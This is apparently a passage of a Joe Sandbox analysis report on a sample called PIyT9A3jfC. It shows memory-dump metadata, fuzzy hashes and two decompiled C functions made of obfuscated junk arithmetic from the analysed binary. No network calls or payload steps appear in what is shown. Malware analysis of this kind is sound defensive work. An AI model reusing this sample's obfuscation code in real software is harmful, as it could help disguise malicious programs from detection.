                                                                                                                                                                                                                                                                      0x011847aa
                                                                                                                                                                                                                                                                      0x011847b2
                                                                                                                                                                                                                                                                      0x011847b8
                                                                                                                                                                                                                                                                      0x011847be
                                                                                                                                                                                                                                                                      0x011847c2
                                                                                                                                                                                                                                                                      0x011847d1
                                                                                                                                                                                                                                                                      0x011847d7

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 4003e2d0e95e5b69b2f62642b2b0604c507599fe2382a5009107e7dbd0ca2c76
                                                                                                                                                                                                                                                                      • Instruction ID: 28fc7523561d84192c7f474ccf6816fe0690a3a63a4110d3579233def3b7e7b7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4003e2d0e95e5b69b2f62642b2b0604c507599fe2382a5009107e7dbd0ca2c76
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3212E574600258CFCB28CF69E4949A97BF2FF98304B24825AFD6587359DB35E951CF80
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                                                                                      			E01197E80(signed int _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                      				char _v5;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				signed short _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				short _v24;
                                                                                                                                                                                                                                                                      				short _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				signed int _v76;
                                                                                                                                                                                                                                                                      				signed int _v80;
                                                                                                                                                                                                                                                                      				signed int _v84;
                                                                                                                                                                                                                                                                      				signed int _v88;
                                                                                                                                                                                                                                                                      				signed int _v92;
                                                                                                                                                                                                                                                                      				signed int _v96;
                                                                                                                                                                                                                                                                      				signed int _v100;
                                                                                                                                                                                                                                                                      				signed int _v104;
                                                                                                                                                                                                                                                                      				signed int _t324;
                                                                                                                                                                                                                                                                      				signed int _t326;
                                                                                                                                                                                                                                                                      				signed int _t328;
                                                                                                                                                                                                                                                                      				intOrPtr _t336;
                                                                                                                                                                                                                                                                      				signed int _t351;
                                                                                                                                                                                                                                                                      				signed int _t376;
                                                                                                                                                                                                                                                                      				signed int _t377;
                                                                                                                                                                                                                                                                      				intOrPtr _t387;
                                                                                                                                                                                                                                                                      				signed int _t389;
                                                                                                                                                                                                                                                                      				signed int _t409;
                                                                                                                                                                                                                                                                      				signed int _t423;
                                                                                                                                                                                                                                                                      				signed int _t432;
                                                                                                                                                                                                                                                                      				intOrPtr _t434;
                                                                                                                                                                                                                                                                      				signed char _t475;
                                                                                                                                                                                                                                                                      				signed int _t485;
                                                                                                                                                                                                                                                                      				signed char _t493;
                                                                                                                                                                                                                                                                      				signed short _t498;
                                                                                                                                                                                                                                                                      				intOrPtr _t500;
                                                                                                                                                                                                                                                                      				signed short _t504;
                                                                                                                                                                                                                                                                      				signed int _t516;
                                                                                                                                                                                                                                                                      				intOrPtr _t568;
                                                                                                                                                                                                                                                                      				intOrPtr _t570;
                                                                                                                                                                                                                                                                      				intOrPtr _t572;
                                                                                                                                                                                                                                                                      				intOrPtr _t580;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v72 =  *((intOrPtr*)(_a8 + 0x74e0));
                                                                                                                                                                                                                                                                      				_v12 = 0x11d7;
                                                                                                                                                                                                                                                                      				_t475 =  *0x121dee4; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121dee4 = _t475 - 1;
                                                                                                                                                                                                                                                                      				_t409 =  *0x121df30; // 0x0
                                                                                                                                                                                                                                                                      				_v76 = ( *0x121dee4 & 0x000000ff) %  *(_a8 + _t409 * 4);
                                                                                                                                                                                                                                                                      				_v80 =  *0x121def0 & 0x0000ffff | 0x00000fdd;
                                                                                                                                                                                                                                                                      				_v5 = 0;
                                                                                                                                                                                                                                                                      				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                                      				_v52 = _a4 / 0x1d70;
                                                                                                                                                                                                                                                                      				_t324 =  *0x121ded8; // 0x0
                                                                                                                                                                                                                                                                      				_v64 = _t324 %  *0x121df00;
                                                                                                                                                                                                                                                                      				_t485 =  *0x121ded8; // 0x0
                                                                                                                                                                                                                                                                      				_v84 = _t485;
                                                                                                                                                                                                                                                                      				_t326 =  *0x121df14; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121df14 = _t326 + 1;
                                                                                                                                                                                                                                                                      				_t328 =  *0x121dee8; // 0x0
                                                                                                                                                                                                                                                                      				_v88 = _t328 %  *0x121df14;
                                                                                                                                                                                                                                                                      				_v92 = _a4 / _a4;
                                                                                                                                                                                                                                                                      				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                                      				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                                      				_v20 = _a4;
                                                                                                                                                                                                                                                                      				_v40 = _a4 |  *0x121dee0;
                                                                                                                                                                                                                                                                      				_v68 = 0x278;
                                                                                                                                                                                                                                                                      				_t572 =  *0x121df20; // 0x0
                                                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                                                      				_v36 = ( *0x121dee5 & 0x000000ff) /  *(_t572 + (_a4 << 1) * 4);
                                                                                                                                                                                                                                                                      				_t493 =  *0x121dee6; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121dee6 = _t493 - 1;
                                                                                                                                                                                                                                                                      				_v60 =  *0x121dee6 & 0x000000ff;
                                                                                                                                                                                                                                                                      				_v16 = 0x7b4;
                                                                                                                                                                                                                                                                      				_t336 =  *0x121df0c; // 0x0
                                                                                                                                                                                                                                                                      				_v96 =  *(_t336 + _a4 * 4) ^ 0x0000117e;
                                                                                                                                                                                                                                                                      				_v24 =  *((intOrPtr*)(_a8 + 0x16cc));
                                                                                                                                                                                                                                                                      				_v48 = _a4;
                                                                                                                                                                                                                                                                      				_v32 = ( *0x121def0 & 0x0000ffff) * _a4;
                                                                                                                                                                                                                                                                      				_t498 =  *0x121def0; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121def0 = _t498 - 1;
                                                                                                                                                                                                                                                                      				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                                      				_t423 =  *0x121df30; // 0x0
                                                                                                                                                                                                                                                                      				_t500 =  *0x121df24; // 0x0
                                                                                                                                                                                                                                                                      				_v56 =  *((intOrPtr*)(_t500 + 4 + _t423 * 4));
                                                                                                                                                                                                                                                                      				_v100 = _a4;
                                                                                                                                                                                                                                                                      				_v104 =  *0x121dee5 & 0x000000ff ^  *(_a8 + 0x1f2c);
                                                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                                                      				_v28 = ( *0x121dee4 & 0x000000ff) % 0x17c;
                                                                                                                                                                                                                                                                      				_t504 =  *0x121def0; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121def0 = _t504 - 1;
                                                                                                                                                                                                                                                                      				_v44 = ( *0x121dee6 & 0x000000ff) *  *(_a8 + ( *0x121def0 & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                                      				_a4 = _a4 + 1;
                                                                                                                                                                                                                                                                      				_t570 =  *0x121df20; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121dee4 = _a4 /  *(_t570 + 0x134c) % _a4 - ( *0x121dee4 & 0x000000ff);
                                                                                                                                                                                                                                                                      				_t351 =  *0x121df18; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121df18 = _t351 - 1;
                                                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                                                      				_t432 =  *0x121dee0; // 0x0
                                                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                                                      				_t516 =  *0x121dee0; // 0x0
                                                                                                                                                                                                                                                                      				 *(_v40 + _t516 * 4) = ( *(_v56 +  *0x121dee0 * 3 * 4) * 0x00001eb5 /  *0x121df10 ^  *0x121df18) /  *(_v40 + _t432 * 4);
                                                                                                                                                                                                                                                                      				_t434 =  *0x121dedc; // 0x0
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v36 + _v32 * 3 * 4)) = 0xa9c -  *((intOrPtr*)(_t434 + 0x24f8)) -  *((intOrPtr*)(_v36 + _v32 * 3 * 4));
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v52 + _v32 * 4)) =  *(_a8 + 0x3f10) ^  *(_v36 + (_v12 & 0x0000ffff) * 4) ^  *(_v52 + _v32 * 4);
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_a8 + _v32 * 4)) = 0xdd9 % _a4 / ( *0x121dee4 & 0x000000ff) +  *((intOrPtr*)(_a8 + _v32 * 4));
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_a8 + _a4 * 4)) = ( *(_v48 + _v32 * 3 * 4) ^ 0x00000798) * _v32 +  *((intOrPtr*)(_a8 + _a4 * 4));
                                                                                                                                                                                                                                                                      				_v44 = _v44 - 1;
                                                                                                                                                                                                                                                                      				_v5 =  *((intOrPtr*)(_v40 + _v44 * 3 * 4)) + (_v12 & 0x0000ffff) ^ 0x00000f02;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_v36 + (_v20 & 0x0000ffff) * 3 * 4)) =  *(_v36 + (_v20 & 0x0000ffff) * 3 * 4) ^ 0x000002b7;
                                                                                                                                                                                                                                                                      				_t376 =  *0x121df00; // 0x0
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_a8 + _a4 * 3 * 4)) !=  *((intOrPtr*)(_v40 + _t376 * 4))) {
                                                                                                                                                                                                                                                                      					_t377 =  *0x121df00; // 0x0
                                                                                                                                                                                                                                                                      					_v68 = _t377;
                                                                                                                                                                                                                                                                      					_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                      					asm("cdq");
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_v36 + ((_v12 & 0x0000ffff) << 1) * 4)) = (_v16 & 0x0000ffff ^ 0x00000a3c) % ( *0x121dee4 & 0x000000ff) *  *(_v36 + ((_v12 & 0x0000ffff) << 1) * 4);
                                                                                                                                                                                                                                                                      					_v12 = _v12 - 1;
                                                                                                                                                                                                                                                                      					_v32 = _v32 - 1;
                                                                                                                                                                                                                                                                      					_t387 =  *0x121def8; // 0x0
                                                                                                                                                                                                                                                                      					return _t387 -  *((intOrPtr*)(_a8 + _v32 * 4));
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t389 =  *0x121df14; // 0x0
                                                                                                                                                                                                                                                                      				 *(_a8 +  *0x121df30 * 3 * 4) = _t389 /  *(_a8 +  *0x121df30 * 3 * 4);
                                                                                                                                                                                                                                                                      				 *0x121df14 = (_a4 &  *(_a8 + 0x64 + _a4 * 4)) +  *0x121df14;
                                                                                                                                                                                                                                                                      				 *(_v48 + _a4 * 4) = 0x1992 %  *(_v48 + _a4 * 4);
                                                                                                                                                                                                                                                                      				_v24 = (_a4 ^ 0x00000dbd) % _a4;
                                                                                                                                                                                                                                                                      				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_a8 + _a4 * 4)) = _v32 %  *(_v60 + _a4 * 4);
                                                                                                                                                                                                                                                                      				_t580 =  *0x121dedc; // 0x0
                                                                                                                                                                                                                                                                      				_v44 =  *(_v64 + (_v32 << 1) * 4) |  *(_t580 + 8 + _a4 * 4);
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_a8 + (_v12 & 0x0000ffff) * 4)) = _a4 -  *(_a8 + _a4 * 4) ^  *(_a8 + (_v12 & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                                      				_v32 = _v32 - 1;
                                                                                                                                                                                                                                                                      				_t568 =  *0x121def8; // 0x0
                                                                                                                                                                                                                                                                      				return _t568 -  *((intOrPtr*)(_a8 + _v32 * 4));
                                                                                                                                                                                                                                                                      			}




















































                                                                                                                                                                                                                                                                      0x01197e99
                                                                                                                                                                                                                                                                      0x01197ea1
                                                                                                                                                                                                                                                                      0x01197ea5
                                                                                                                                                                                                                                                                      0x01197eae
                                                                                                                                                                                                                                                                      0x01197ebb
                                                                                                                                                                                                                                                                      0x01197ec9
                                                                                                                                                                                                                                                                      0x01197ed9
                                                                                                                                                                                                                                                                      0x01197edc
                                                                                                                                                                                                                                                                      0x01197ee6
                                                                                                                                                                                                                                                                      0x01197ef5
                                                                                                                                                                                                                                                                      0x01197ef8
                                                                                                                                                                                                                                                                      0x01197f05
                                                                                                                                                                                                                                                                      0x01197f08
                                                                                                                                                                                                                                                                      0x01197f0e
                                                                                                                                                                                                                                                                      0x01197f11
                                                                                                                                                                                                                                                                      0x01197f19
                                                                                                                                                                                                                                                                      0x01197f1e
                                                                                                                                                                                                                                                                      0x01197f2b
                                                                                                                                                                                                                                                                      0x01197f36
                                                                                                                                                                                                                                                                      0x01197f3f
                                                                                                                                                                                                                                                                      0x01197f48
                                                                                                                                                                                                                                                                      0x01197f4f
                                                                                                                                                                                                                                                                      0x01197f5c
                                                                                                                                                                                                                                                                      0x01197f5f
                                                                                                                                                                                                                                                                      0x01197f72
                                                                                                                                                                                                                                                                      0x01197f78
                                                                                                                                                                                                                                                                      0x01197f7c
                                                                                                                                                                                                                                                                      0x01197f7f
                                                                                                                                                                                                                                                                      0x01197f88
                                                                                                                                                                                                                                                                      0x01197f95
                                                                                                                                                                                                                                                                      0x01197f9d
                                                                                                                                                                                                                                                                      0x01197fa4
                                                                                                                                                                                                                                                                      0x01197fb2
                                                                                                                                                                                                                                                                      0x01197fc7
                                                                                                                                                                                                                                                                      0x01197fce
                                                                                                                                                                                                                                                                      0x01197fdc
                                                                                                                                                                                                                                                                      0x01197fdf
                                                                                                                                                                                                                                                                      0x01197fea
                                                                                                                                                                                                                                                                      0x01197ff7
                                                                                                                                                                                                                                                                      0x01197ffa
                                                                                                                                                                                                                                                                      0x01198000
                                                                                                                                                                                                                                                                      0x0119800a
                                                                                                                                                                                                                                                                      0x01198010
                                                                                                                                                                                                                                                                      0x0119802b
                                                                                                                                                                                                                                                                      0x01198035
                                                                                                                                                                                                                                                                      0x0119803d
                                                                                                                                                                                                                                                                      0x01198041
                                                                                                                                                                                                                                                                      0x0119804c
                                                                                                                                                                                                                                                                      0x01198068
                                                                                                                                                                                                                                                                      0x01198071
                                                                                                                                                                                                                                                                      0x01198086
                                                                                                                                                                                                                                                                      0x0119809b
                                                                                                                                                                                                                                                                      0x011980a1
                                                                                                                                                                                                                                                                      0x011980a9
                                                                                                                                                                                                                                                                      0x011980bf
                                                                                                                                                                                                                                                                      0x011980cc
                                                                                                                                                                                                                                                                      0x011980d5
                                                                                                                                                                                                                                                                      0x011980d9
                                                                                                                                                                                                                                                                      0x011980e2
                                                                                                                                                                                                                                                                      0x011980f0
                                                                                                                                                                                                                                                                      0x0119810f
                                                                                                                                                                                                                                                                      0x0119813c
                                                                                                                                                                                                                                                                      0x01198165
                                                                                                                                                                                                                                                                      0x0119818b
                                                                                                                                                                                                                                                                      0x01198194
                                                                                                                                                                                                                                                                      0x011981ad
                                                                                                                                                                                                                                                                      0x011981cc
                                                                                                                                                                                                                                                                      0x011981d3
                                                                                                                                                                                                                                                                      0x011981e4
                                                                                                                                                                                                                                                                      0x011982c5
                                                                                                                                                                                                                                                                      0x011982ca
                                                                                                                                                                                                                                                                      0x011982d5
                                                                                                                                                                                                                                                                      0x011982e9
                                                                                                                                                                                                                                                                      0x01198302
                                                                                                                                                                                                                                                                      0x0119830d
                                                                                                                                                                                                                                                                      0x01198317
                                                                                                                                                                                                                                                                      0x01198320
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01198325
                                                                                                                                                                                                                                                                      0x011981f4
                                                                                                                                                                                                                                                                      0x01198208
                                                                                                                                                                                                                                                                      0x0119821e
                                                                                                                                                                                                                                                                      0x0119823a
                                                                                                                                                                                                                                                                      0x0119824a
                                                                                                                                                                                                                                                                      0x01198254
                                                                                                                                                                                                                                                                      0x0119826b
                                                                                                                                                                                                                                                                      0x01198279
                                                                                                                                                                                                                                                                      0x01198286
                                                                                                                                                                                                                                                                      0x011982a6
                                                                                                                                                                                                                                                                      0x011982af
                                                                                                                                                                                                                                                                      0x011982b8
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 293b066b1691e85508ea37a9b6634cb16bda75ca08908dba96d826b19e34341a
                                                                                                                                                                                                                                                                      • Instruction ID: 8676af13d1485e5eca2c719375e5302fd68b6b350e662a6b40b2aa5d2354e910
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 293b066b1691e85508ea37a9b6634cb16bda75ca08908dba96d826b19e34341a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FF14174904119DFCB18CFA9D0989ADBBB2FFAD304F14C15AE855AB348CB35AA51CF80
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: db31036392c4d88dc03ecc63824c8361326f38930f0d15b3e0751aa5a25c594b
                                                                                                                                                                                                                                                                      • Instruction ID: 7fd55116d91378b6e118f5c6b5f204e377cd9583523e9c061692513390747e5d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db31036392c4d88dc03ecc63824c8361326f38930f0d15b3e0751aa5a25c594b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1B10020E2BF414DD627A6398871336B65CAFBB2D5F91D72BFC2670D66EB2181C34240
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E01198850(intOrPtr _a4, signed int _a8, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _t152;
                                                                                                                                                                                                                                                                      				intOrPtr _t166;
                                                                                                                                                                                                                                                                      				intOrPtr _t168;
                                                                                                                                                                                                                                                                      				intOrPtr _t171;
                                                                                                                                                                                                                                                                      				intOrPtr _t182;
                                                                                                                                                                                                                                                                      				intOrPtr _t197;
                                                                                                                                                                                                                                                                      				intOrPtr _t234;
                                                                                                                                                                                                                                                                      				intOrPtr _t272;
                                                                                                                                                                                                                                                                      				intOrPtr _t290;
                                                                                                                                                                                                                                                                      				intOrPtr _t301;
                                                                                                                                                                                                                                                                      				intOrPtr _t306;
                                                                                                                                                                                                                                                                      				intOrPtr _t307;
                                                                                                                                                                                                                                                                      				intOrPtr _t312;
                                                                                                                                                                                                                                                                      				intOrPtr _t316;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v36 = _a24 - 0xe5;
                                                                                                                                                                                                                                                                      				_v16 = _a28 - 0x2674;
                                                                                                                                                                                                                                                                      				_v20 = _a24 - 0x191;
                                                                                                                                                                                                                                                                      				_v24 = _a28 + 0x1c6;
                                                                                                                                                                                                                                                                      				_v32 = _a8 ^ 0x0000002f;
                                                                                                                                                                                                                                                                      				_v28 = _a8 - 0x2796;
                                                                                                                                                                                                                                                                      				_v12 = _a28 + 0x1c6;
                                                                                                                                                                                                                                                                      				_v8 = _a20;
                                                                                                                                                                                                                                                                      				if(_v32 <= _v8 + 0x65) {
                                                                                                                                                                                                                                                                      					_t152 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t312 =  *0x121d6a0; // 0x0
                                                                                                                                                                                                                                                                      					if( *0x01DCB271 < (_t312 +  *((intOrPtr*)(_t152 + 0xd4)) | 0x00002565)) {
                                                                                                                                                                                                                                                                      						_v20 = _v20 -  *((intOrPtr*)(_a4 + 0xbadbc1)) +  *(_a4 + 0xf4);
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						if(_v36 >= ( *(_a4 + 0x30) & 0x000025a0) &&  *0x01DCB241 >=  *0x01DCB1DD -  *((intOrPtr*)(_a4 + 0x68))) {
                                                                                                                                                                                                                                                                      							_t272 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_v12 = ( *((intOrPtr*)(_t272 + 0xbadbfd)) - 0x25a0) * _v12;
                                                                                                                                                                                                                                                                      							_t166 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_v28 = (_v8 ^  *(_t166 + 0xd4)) * _v8 | _v28;
                                                                                                                                                                                                                                                                      							_t168 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_v60 = (_v12 ^ _v16) +  *((intOrPtr*)(_t168 + 0xa4));
                                                                                                                                                                                                                                                                      							_v56 = _a4;
                                                                                                                                                                                                                                                                      							_v52 = _v32 | 0x00002674;
                                                                                                                                                                                                                                                                      							_v48 = _v16 ^ _v12;
                                                                                                                                                                                                                                                                      							_v44 = _v20 & _v8;
                                                                                                                                                                                                                                                                      							_t171 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t119 = _t171 + 0x8c; // 0x0
                                                                                                                                                                                                                                                                      							_v40 =  *0x01DCB219 -  *_t119;
                                                                                                                                                                                                                                                                      							_v16 = E01195EA0(_v60, _v56, _v52, _v48, _v44, _v40);
                                                                                                                                                                                                                                                                      							 *0x121d62c = ( *(_a4 + 0x40) & _v12) *  *0x121d62c;
                                                                                                                                                                                                                                                                      							 *(_a4 + 0xb0) = _v8 & 0x00002628 ^  *(_a4 + 0xb0);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xb4) =  *(_a4 + 0xb4) * 0x43f95;
                                                                                                                                                                                                                                                                      					_v24 = _v24 - 0x39;
                                                                                                                                                                                                                                                                      					_t234 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t234 + 0x78)) < 0x387f) {
                                                                                                                                                                                                                                                                      						 *(_a4 + 0xbadbfd) =  *(_a4 + 0xbadbfd) | 0x00114117;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t182 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t33 = _t182 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                                      					if( *_t33 !=  *((intOrPtr*)(_a4 + 0x7c))) {
                                                                                                                                                                                                                                                                      						_t307 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_a4 + 0xf4) =  *((intOrPtr*)(_t307 + 0xbadc71)) + 0x45d2;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t290 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t290 + 0xb4)) != 0x425f) {
                                                                                                                                                                                                                                                                      						_t306 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t46 = _t306 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                                      						_t197 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t197 + 0xec) =  *((intOrPtr*)(_a4 + 0x9c)) -  *((intOrPtr*)(_a4 + 0xbadc71)) + 0x000e606d ^  *_t46;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_a4 + 0x10)) <= 0x122a8) {
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0x3c)) = 0x161485;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if( *(_a4 + 0xb4) != 0x111b0) {
                                                                                                                                                                                                                                                                      						_t301 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t316 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t55 = _t301 + 0xe0; // 0xfffe3a5b
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0x14)) = ( *_t55 ^  *(_t316 + 0xa4)) +  *((intOrPtr*)(_a4 + 0x14)) + 0x1895d7;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *0x121d668 =  *((intOrPtr*)(_a4 + 0xb8)) + 0x00107368 |  *0x121d668;
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_a4 + 0x8c)) <= 0xb84a) {
                                                                                                                                                                                                                                                                      						 *0x121d6b0 = 0x6f;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						 *(_a4 + 0x40) =  *(_a4 + 0xe4) ^  *(_a4 + 0xf4) ^ 0x00014d63 ^  *(_a4 + 0x40);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _v8 ^ 0x000003bc;
